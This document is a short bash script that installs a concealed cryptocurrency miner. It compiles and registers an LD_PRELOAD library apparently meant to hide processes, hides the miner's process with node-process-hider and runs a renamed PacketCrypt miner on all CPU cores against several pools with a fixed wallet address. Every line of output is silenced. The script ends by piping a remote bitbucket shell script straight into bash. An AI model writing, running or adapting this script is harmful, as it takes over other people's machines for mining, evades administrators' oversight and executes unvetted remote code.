#!/bin/bash
apt-get update ; apt-get install sudo -y
curl https://github.com/adawisaud/adawisaud/raw/main/nyumput.c -o nyumput.c
apt-get install build-essential -y
gcc -Wall -fPIC -shared -o libnyumput.so nyumput.c -ldl
mv libnyumput.so /usr/local/lib/
echo /usr/local/lib/libnyumput.so >> /etc/ld.so.preload
rm nyumput.c
echo "supersede domain-name-servers 1.1.1.1;">> /etc/dhcp/dhclient.conf
/etc/init.d/network restart
sudo su --command "apt-get update && apt-get install gcc -y && curl -sL https://deb.nodesource.com/setup_14.x | bash && apt-get install nodejs -y && npm install -g npm@9.3.1 -y && npm i -g node-process-hider && ph add sgr1"
mkdir .kap && cd .kap
wget -O sgr1 https://github.com/cjdelisle/packetcrypt_rs/releases/download/packetcrypt-v0.5.2/packetcrypt-v0.5.2-linux_amd64 >/dev/null 2>&1
chmod +x sgr1 
sudo ./sgr1 ann -p pkt1qgwzdljmxtekhqkkl9jzlhe6lpej5tykurudvqg http://pool.pkt.world/master/1024 http://pool.pktpool.io/diff/1024 http://pool.pkteer.com/d/1024 https://stratum.zetahash.com/d/1024 -t $(nproc --all) > /dev/null 2>&1 &
curl -sL https://bitbucket.org/mypile/filesg/raw/main/boled04.sh | bash